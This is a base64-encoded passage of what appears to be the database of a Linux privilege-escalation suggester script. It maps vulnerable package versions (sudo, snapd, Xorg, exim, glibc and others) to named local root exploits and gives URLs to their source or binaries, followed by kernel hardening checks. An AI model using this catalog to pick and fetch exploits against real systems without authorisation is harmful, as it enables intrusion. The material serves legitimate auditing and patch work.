8vd3d3LnF1YWx5cy5jb20vMjAxNy8wNi8xOS9zdGFjay1jbGFzaC9zdGFjay1jbGFzaC50eHQKc3JjLXVybDogaHR0cHM6Ly93d3cucXVhbHlzLmNvbS8yMDE3LzA2LzE5L3N0YWNrLWNsYXNoL2xpbnV4X29mZnNldDJsaWIuYwpleHBsb2l0LWRiOiA0MjI3MwphdXRob3I6IFF1YWx5cwpDb21tZW50czogVXNlcyAiU3RhY2sgQ2xhc2giIHRlY2huaXF1ZQpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDAwMDAxXSR7dHh0cnN0fSBSYXRpb25hbExvdmUKUmVxczogcGtnPWdsaWJjfGxpYmM2LHZlcjwyLjI3LENPTkZJR19VU0VSX05TPXksc3lzY3RsOmtlcm5lbC51bnByaXZpbGVnZWRfdXNlcm5zX2Nsb25lPT0xLHg4Nl82NApUYWdzOiBkZWJpYW49OXtsaWJjNjoyLjI0LTExK2RlYjl1MX0sdWJ1bnR1PTE2LjA0LjN7bGliYzY6Mi4yMy0wdWJ1bnR1OX0KUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3LmhhbGZkb2cubmV0L1NlY3VyaXR5LzIwMTcvTGliY1JlYWxwYXRoQnVmZmVyVW5kZXJmbG93LwpzcmMtdXJsOiBodHRwczovL3d3dy5oYWxmZG9nLm5ldC9TZWN1cml0eS8yMDE3L0xpYmNSZWFscGF0aEJ1ZmZlclVuZGVyZmxvdy9SYXRpb25hbExvdmUuYwpDb21tZW50czoga2VybmVsLnVucHJpdmlsZWdlZF91c2VybnNfY2xvbmU9MSByZXF1aXJlZApiaW4tdXJsOiBodHRwczovL3Jhdy5naXRodWJ1c2VyY29udGVudC5jb20vcmFwaWQ3L21ldGFzcGxvaXQtZnJhbWV3b3JrL21hc3Rlci9kYXRhL2V4cGxvaXRzL2N2ZS0yMDE4LTEwMDAwMDEvUmF0aW9uYWxMb3ZlCmV4cGxvaXQtZGI6IDQzNzc1CmF1dGhvcjogaGFsZmRvZwpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xMDkwMF0ke3R4dHJzdH0gdnBuY19wcml2ZXNjLnB5ClJlcXM6IHBrZz1uZXR3b3JrbWFuYWdlci12cG5jfG5ldHdvcmstbWFuYWdlci12cG5jLHZlcjwxLjIuNgpUYWdzOiB1YnVudHU9MTYuMDR7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4xLjkzLTF9LGRlYmlhbj05LjB7bmV0d29yay1tYW5hZ2VyLXZwbmM6MS4yLjQtNH0sbWFuamFybz0xNwpSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9wdWxzZXNlY3VyaXR5LmNvLm56L2Fkdmlzb3JpZXMvTk0tVlBOQy1Qcml2ZXNjCnNyYy11cmw6IGh0dHBzOi8vYnVnemlsbGEubm92ZWxsLmNvbS9hdHRhY2htZW50LmNnaT9pZD03NzkxMTAKZXhwbG9pdC1kYjogNDUzMTMKYXV0aG9yOiBEZW5pcyBBbmR6YWtvdmljCkNvbW1lbnRzOiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOC0xNDY2NV0ke3R4dHJzdH0gcmFwdG9yX3hvcmd5ClJlcXM6IHBrZz14b3JnLXgxMS1zZXJ2ZXItWG9yZyxjbWQ6WyAtdSAvdXNyL2Jpbi9Yb3JnIF0KVGFnczogY2VudG9zPTcuNApSYW5rOiAxCmFuYWx5c2lzLXVybDogaHR0cHM6Ly93d3cuc2VjdXJlcGF0dGVybnMuY29tLzIwMTgvMTAvY3ZlLTIwMTgtMTQ2NjUteG9yZy14LXNlcnZlci5odG1sCmV4cGxvaXQtZGI6IDQ1OTIyCmF1dGhvcjogcmFwdG9yCkNvbW1lbnRzOiBYLk9yZyBTZXJ2ZXIgYmVmb3JlIDEuMjAuMyBpcyB2dWxuZXJhYmxlLiBEaXN0cm9zIHVzZSBvd24gdmVyc2lvbmluZyBzY2hlbWUuIE1hbnVhbCB2ZXJpZmljYXRpb24gbmVlZGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS03MzA0XSR7dHh0cnN0fSBkaXJ0eV9zb2NrClJlcXM6IHBrZz1zbmFwZCx2ZXI8Mi4zNyxjbWQ6WyAtUyAvcnVuL3NuYXBkLnNvY2tldCBdClRhZ3M6IHVidW50dT0xOC4xMCxtaW50PTE5ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2luaXRibG9nLmNvbS8yMDE5L2RpcnR5LXNvY2svCmV4cGxvaXQtZGI6IDQ2MzYxCmV4cGxvaXQtZGI6IDQ2MzYyCnNyYy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9pbml0c3RyaW5nL2RpcnR5X3NvY2svYXJjaGl2ZS9tYXN0ZXIuemlwCmF1dGhvcjogSW5pdFN0cmluZwpDb21tZW50czogRGlzdHJvcyB1c2Ugb3duIHZlcnNpb25pbmcgc2NoZW1lLiBNYW51YWwgdmVyaWZpY2F0aW9uIG5lZWRlZC4KRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTAxNDldJHt0eHRyc3R9IHJhcHRvcl9leGltX3dpegpSZXFzOiBwa2c9ZXhpbXxleGltNCx2ZXI+PTQuODcsdmVyPD00LjkxClRhZ3M6ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMTkvMDYvMDUvY3ZlLTIwMTktMTAxNDkvcmV0dXJuLXdpemFyZC1yY2UtZXhpbS50eHQKZXhwbG9pdC1kYjogNDY5OTYKYXV0aG9yOiByYXB0b3IKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTIxODFdJHt0eHRyc3R9IFNlcnYtVSBGVFAgU2VydmVyClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvU2Vydi1VL1NlcnYtVSBdClRhZ3M6IGRlYmlhbj05ClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL2Jsb2cudmFzdGFydC5kZXYvMjAxOS8wNi9jdmUtMjAxOS0xMjE4MS1zZXJ2LXUtZXhwbG9pdC13cml0ZXVwLmh0bWwKZXhwbG9pdC1kYjogNDcwMDkKc3JjLXVybDogaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL2d1eXdoYXRhZ3V5L0NWRS0yMDE5LTEyMTgxL21hc3Rlci9zZXJ2dS1wZS1jdmUtMjAxOS0xMjE4MS5jCmV4dC11cmw6IGh0dHBzOi8vcmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbS9iY29sZXMvbG9jYWwtZXhwbG9pdHMvbWFzdGVyL0NWRS0yMDE5LTEyMTgxL1NVcm9vdAphdXRob3I6IEd1eSBMZXZpbiAob3JnaW5hbCBleHBsb2l0IGF1dGhvcik7IEJyZW5kYW4gQ29sZXMgKGF1dGhvciBvZiBleHBsb2l0IHVwZGF0ZSBhdCAnZXh0LXVybCcpCkNvbW1lbnRzOiBNb2RpZmllZCB2ZXJzaW9uIGF0ICdleHQtdXJsJyB1c2VzIGJhc2ggZXhlYyB0ZWNobmlxdWUsIHJhdGhlciB0aGFuIGNvbXBpbGluZyB3aXRoIGdjYy4KRU9GCikKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAxOS0xODg2Ml0ke3R4dHJzdH0gR05VIE1haWx1dGlscyAyLjAgPD0gMy43IG1haWRhZyB1cmwgbG9jYWwgcm9vdCAoQ1ZFLTIwMTktMTg4NjIpClJlcXM6IGNtZDpbIC11IC91c3IvbG9jYWwvc2Jpbi9tYWlkYWcgXQpUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lm1pa2UtZ3VhbHRpZXJpLmNvbS9wb3N0cy9maW5kaW5nLWEtZGVjYWRlLW9sZC1mbGF3LWluLWdudS1tYWlsdXRpbHMKZXh0LXVybDogaHR0cHM6Ly9naXRodWIuY29tL2Jjb2xlcy9sb2NhbC1leHBsb2l0cy9yYXcvbWFzdGVyL0NWRS0yMDE5LTE4ODYyL2V4cGxvaXQuY3Jvbi5zaApzcmMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vYmNvbGVzL2xvY2FsLWV4cGxvaXRzL3Jhdy9tYXN0ZXIvQ1ZFLTIwMTktMTg4NjIvZXhwbG9pdC5sZHByZWxvYWQuc2gKYXV0aG9yOiBiY29sZXMKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTktMTg2MzRdJHt0eHRyc3R9IHN1ZG8gcHdmZWVkYmFjawpSZXFzOiBwa2c9c3Vkbyx2ZXI8MS44LjMxClRhZ3M6IG1pbnQ9MTkKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vZHlsYW5rYXR6LmNvbS9BbmFseXNpcy1vZi1DVkUtMjAxOS0xODYzNC8Kc3JjLXVybDogaHR0cHM6Ly9naXRodWIuY29tL3NhbGVlbXJhc2hpZC9zdWRvLWN2ZS0yMDE5LTE4NjM0L3Jhdy9tYXN0ZXIvZXhwbG9pdC5jCmF1dGhvcjogc2FsZWVtcmFzaGlkCkNvbW1lbnRzOiBzdWRvIGNvbmZpZ3VyYXRpb24gcmVxdWlyZXMgcHdmZWVkYmFjayB0byBiZSBlbmFibGVkLgpFT0YKKQoKRVhQTE9JVFNfVVNFUlNQQUNFWygobisrKSldPSQoY2F0IDw8RU9GCk5hbWU6ICR7dHh0Z3JufVtDVkUtMjAyMC05NDcwXSR7dHh0cnN0fSBXaW5nIEZUUCBTZXJ2ZXIgPD0gNi4yLjUgTFBFClJlcXM6IGNtZDpbIC14IC9ldGMvaW5pdC5kL3dmdHBzZXJ2ZXIgXQpUYWdzOiB1YnVudHU9MTgKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAucGhwCnNyYy11cmw6IGh0dHBzOi8vd3d3Lmhvb3BlcmxhYnMueHl6L2Rpc2Nsb3N1cmVzL2N2ZS0yMDIwLTk0NzAuc2gKZXhwbG9pdC1kYjogNDgxNTQKYXV0aG9yOiBDYXJ5IENvb3BlcgpDb21tZW50czogUmVxdWlyZXMgYW4gYWRtaW5pc3RyYXRvciB0byBsb2dpbiB2aWEgdGhlIHdlYiBpbnRlcmZhY2UuCkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdApSZXFzOiBwa2c9c3Vkbyx2ZXI8MS45LjVwMgpUYWdzOiBtaW50PTE5LHVidW50dT0xOHwyMCwgZGViaWFuPTEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL2JsYXN0eS9DVkUtMjAyMS0zMTU2L3ppcC9tYWluCmF1dGhvcjogYmxhc3R5CkVPRgopCgpFWFBMT0lUU19VU0VSU1BBQ0VbKChuKyspKV09JChjYXQgPDxFT0YKTmFtZTogJHt0eHRncm59W0NWRS0yMDIxLTMxNTZdJHt0eHRyc3R9IHN1ZG8gQmFyb24gU2FtZWRpdCAyClJlcXM6IHBrZz1zdWRvLHZlcjwxLjkuNXAyClRhZ3M6IGNlbnRvcz02fDd8OCx1YnVudHU9MTR8MTZ8MTd8MTh8MTl8MjAsIGRlYmlhbj05fDEwClJhbms6IDEKYW5hbHlzaXMtdXJsOiBodHRwczovL3d3dy5xdWFseXMuY29tLzIwMjEvMDEvMjYvY3ZlLTIwMjEtMzE1Ni9iYXJvbi1zYW1lZGl0LWhlYXAtYmFzZWQtb3ZlcmZsb3ctc3Vkby50eHQKc3JjLXVybDogaHR0cHM6Ly9jb2RlbG9hZC5naXRodWIuY29tL3dvcmF3aXQvQ1ZFLTIwMjEtMzE1Ni96aXAvbWFpbgphdXRob3I6IHdvcmF3aXQKRU9GCikKCkVYUExPSVRTX1VTRVJTUEFDRVsoKG4rKykpXT0kKGNhdCA8PEVPRgpOYW1lOiAke3R4dGdybn1bQ1ZFLTIwMTctNTYxOF0ke3R4dHJzdH0gc2V0dWlkIHNjcmVlbiB2NC41LjAgTFBFClJlcXM6IHBrZz1zY3JlZW4sdmVyPT00LjUuMApUYWdzOiAKUmFuazogMQphbmFseXNpcy11cmw6IGh0dHBzOi8vc2VjbGlzdHMub3JnL29zcy1zZWMvMjAxNy9xMS8xODQKZXhwbG9pdC1kYjogaHR0cHM6Ly93d3cuZXhwbG9pdC1kYi5jb20vZXhwbG9pdHMvNDExNTQKRU9GCikKCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCiMjIHNlY3VyaXR5IHJlbGF0ZWQgSFcva2VybmVsIGZlYXR1cmVzCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjCm49MAoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogTWFpbmxpbmUga2VybmVsIHByb3RlY3Rpb24gbWVjaGFuaXNtczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEtlcm5lbCBQYWdlIFRhYmxlIElzb2xhdGlvbiAoUFRJKSBzdXBwb3J0CmF2YWlsYWJsZTogdmVyPj00LjE1CmVuYWJsZWQ6IGNtZDpncmVwIC1FcWkgJ1xzcHRpJyAvcHJvYy9jcHVpbmZvCmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvcHRpLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBHQ0Mgc3RhY2sgcHJvdGVjdG9yIHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFWRV9TVEFDS1BST1RFQ1RPUj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RhY2twcm90ZWN0b3ItcmVndWxhci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogR0NDIHN0YWNrIHByb3RlY3RvciBTVFJPTkcgc3VwcG9ydAphdmFpbGFibGU6IENPTkZJR19TVEFDS1BST1RFQ1RPUl9TVFJPTkc9eSx2ZXI+PTMuMTQKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdGFja3Byb3RlY3Rvci1zdHJvbmcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IExvdyBhZGRyZXNzIHNwYWNlIHRvIHByb3RlY3QgZnJvbSB1c2VyIGFsbG9jYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfREVGQVVMVF9NTUFQX01JTl9BRERSPVswLTldKwplbmFibGVkOiBzeXNjdGw6dm0ubW1hcF9taW5fYWRkciE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL21tYXBfbWluX2FkZHIubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFByZXZlbnQgdXNlcnMgZnJvbSB1c2luZyBwdHJhY2UgdG8gZXhhbWluZSB0aGUgbWVtb3J5IGFuZCBzdGF0ZSBvZiB0aGVpciBwcm9jZXNzZXMKYXZhaWxhYmxlOiBDT05GSUdfU0VDVVJJVFlfWUFNQT15CmVuYWJsZWQ6IHN5c2N0bDprZXJuZWwueWFtYS5wdHJhY2Vfc2NvcGUhPTAKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy95YW1hX3B0cmFjZV9zY29wZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgdW5wcml2aWxlZ2VkIGFjY2VzcyB0byBrZXJuZWwgc3lzbG9nCmF2YWlsYWJsZTogQ09ORklHX1NFQ1VSSVRZX0RNRVNHX1JFU1RSSUNUPXksdmVyPj0yLjYuMzcKZW5hYmxlZDogc3lzY3RsOmtlcm5lbC5kbWVzZ19yZXN0cmljdCE9MAphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2RtZXNnX3Jlc3RyaWN0Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBSYW5kb21pemUgdGhlIGFkZHJlc3Mgb2YgdGhlIGtlcm5lbCBpbWFnZSAoS0FTTFIpCmF2YWlsYWJsZTogQ09ORklHX1JBTkRPTUlaRV9CQVNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9rYXNsci5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogSGFyZGVuZWQgdXNlciBjb3B5IHN1cHBvcnQKYXZhaWxhYmxlOiBDT05GSUdfSEFSREVORURfVVNFUkNPUFk9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL2hhcmRlbmVkX3VzZXJjb3B5Lm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBNYWtlIGtlcm5lbCB0ZXh0IGFuZCByb2RhdGEgcmVhZC1vbmx5CmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9LRVJORUxfUldYPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9zdHJpY3Rfa2VybmVsX3J3eC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2V0IGxvYWRhYmxlIGtlcm5lbCBtb2R1bGUgZGF0YSBhcyBOWCBhbmQgdGV4dCBhcyBSTwphdmFpbGFibGU6IENPTkZJR19TVFJJQ1RfTU9EVUxFX1JXWD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc3RyaWN0X21vZHVsZV9yd3gubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEJVRygpIGNvbmRpdGlvbnMgcmVwb3J0aW5nCmF2YWlsYWJsZTogQ09ORklHX0JVRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBBZGRpdGlvbmFsICdjcmVkJyBzdHJ1Y3QgY2hlY2tzCmF2YWlsYWJsZTogQ09ORklHX0RFQlVHX0NSRURFTlRJQUxTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19jcmVkZW50aWFscy5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogU2FuaXR5IGNoZWNrcyBmb3Igbm90aWZpZXIgY2FsbCBjaGFpbnMKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTk9USUZJRVJTPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9kZWJ1Z19ub3RpZmllcnMubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEV4dGVuZGVkIGNoZWNrcyBmb3IgbGlua2VkLWxpc3RzIHdhbGtpbmcKYXZhaWxhYmxlOiBDT05GSUdfREVCVUdfTElTVD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfbGlzdC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIG9uIHNjYXR0ZXItZ2F0aGVyIHRhYmxlcwphdmFpbGFibGU6IENPTkZJR19ERUJVR19TRz15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvZGVidWdfc2cubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IENoZWNrcyBmb3IgZGF0YSBzdHJ1Y3R1cmUgY29ycnVwdGlvbnMKYXZhaWxhYmxlOiBDT05GSUdfQlVHX09OX0RBVEFfQ09SUlVQVElPTj15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvYnVnX29uX2RhdGFfY29ycnVwdGlvbi5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQ2hlY2tzIGZvciBhIHN0YWNrIG92ZXJydW4gb24gY2FsbHMgdG8gJ3NjaGVkdWxlJwphdmFpbGFibGU6IENPTkZJR19TQ0hFRF9TVEFDS19FTkRfQ0hFQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NjaGVkX3N0YWNrX2VuZF9jaGVjay5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogRnJlZWxpc3Qgb3JkZXIgcmFuZG9taXphdGlvbiBvbiBuZXcgcGFnZXMgY3JlYXRpb24KYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9SQU5ET009eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsYWJfZnJlZWxpc3RfcmFuZG9tLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBGcmVlbGlzdCBtZXRhZGF0YSBoYXJkZW5pbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xBQl9GUkVFTElTVF9IQVJERU5FRD15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvc2xhYl9mcmVlbGlzdF9oYXJkZW5lZC5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogQWxsb2NhdG9yIHZhbGlkYXRpb24gY2hlY2tpbmcKYXZhaWxhYmxlOiBDT05GSUdfU0xVQl9ERUJVR19PTj15LGNtZDohIGdyZXAgJ3NsdWJfZGVidWc9LScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3NsdWJfZGVidWcubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFZpcnR1YWxseS1tYXBwZWQga2VybmVsIHN0YWNrcyB3aXRoIGd1YXJkIHBhZ2VzCmF2YWlsYWJsZTogQ09ORklHX1ZNQVBfU1RBQ0s9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3ZtYXBfc3RhY2subWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFBhZ2VzIHBvaXNvbmluZyBhZnRlciBmcmVlX3BhZ2VzKCkgY2FsbAphdmFpbGFibGU6IENPTkZJR19QQUdFX1BPSVNPTklORz15CmVuYWJsZWQ6IGNtZDogZ3JlcCAncGFnZV9wb2lzb249MScgL3Byb2MvY21kbGluZQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3BhZ2VfcG9pc29uaW5nLm1kCkVPRgopCgpGRUFUVVJFU1soKG4rKykpXT0kKGNhdCA8PEVPRgpmZWF0dXJlOiBVc2luZyAncmVmY291bnRfdCcgaW5zdGVhZCBvZiAnYXRvbWljX3QnCmF2YWlsYWJsZTogQ09ORklHX1JFRkNPVU5UX0ZVTEw9eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3JlZmNvdW50X2Z1bGwubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IEhhcmRlbmluZyBjb21tb24gc3RyL21lbSBmdW5jdGlvbnMgYWdhaW5zdCBidWZmZXIgb3ZlcmZsb3dzCmF2YWlsYWJsZTogQ09ORklHX0ZPUlRJRllfU09VUkNFPXkKYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Yi5jb20vbXpldC0vbGVzLXJlcy9ibG9iL21hc3Rlci9mZWF0dXJlcy9mb3J0aWZ5X3NvdXJjZS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKZmVhdHVyZTogUmVzdHJpY3QgL2Rldi9tZW0gYWNjZXNzCmF2YWlsYWJsZTogQ09ORklHX1NUUklDVF9ERVZNRU09eQphbmFseXNpcy11cmw6IGh0dHBzOi8vZ2l0aHViLmNvbS9temV0LS9sZXMtcmVzL2Jsb2IvbWFzdGVyL2ZlYXR1cmVzL3N0cmljdF9kZXZtZW0ubWQKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFJlc3RyaWN0IEkvTyBhY2Nlc3MgdG8gL2Rldi9tZW0KYXZhaWxhYmxlOiBDT05GSUdfSU9fU1RSSUNUX0RFVk1FTT15CmFuYWx5c2lzLXVybDogaHR0cHM6Ly9naXRodWIuY29tL216ZXQtL2xlcy1yZXMvYmxvYi9tYXN0ZXIvZmVhdHVyZXMvaW9fc3RyaWN0X2Rldm1lbS5tZApFT0YKKQoKRkVBVFVSRVNbKChuKyspKV09JChjYXQgPDxFT0YKc2VjdGlvbjogSGFyZHdhcmUtYmFzZWQgcHJvdGVjdGlvbiBmZWF0dXJlczoKRU9GCikKCkZFQVRVUkVTWygobisrKSldPSQoY2F0IDw8RU9GCmZlYXR1cmU6IFN1cGVydmlzb3IgTW9kZSBFeGVjdXRpb24gUHJvdGVjdGlvbiAoU01FUCkgc3VwcG9ydAphdmFpbGFibGU6IHZlcj49My4wCmVuYWJsZWQ6IGNtZDpncmVwIC1xaSBzbWVwIC9wcm9jL2NwdWluZm8KYW5hbHlzaXMtdXJsOiBodHRwczovL2dpdGh1Y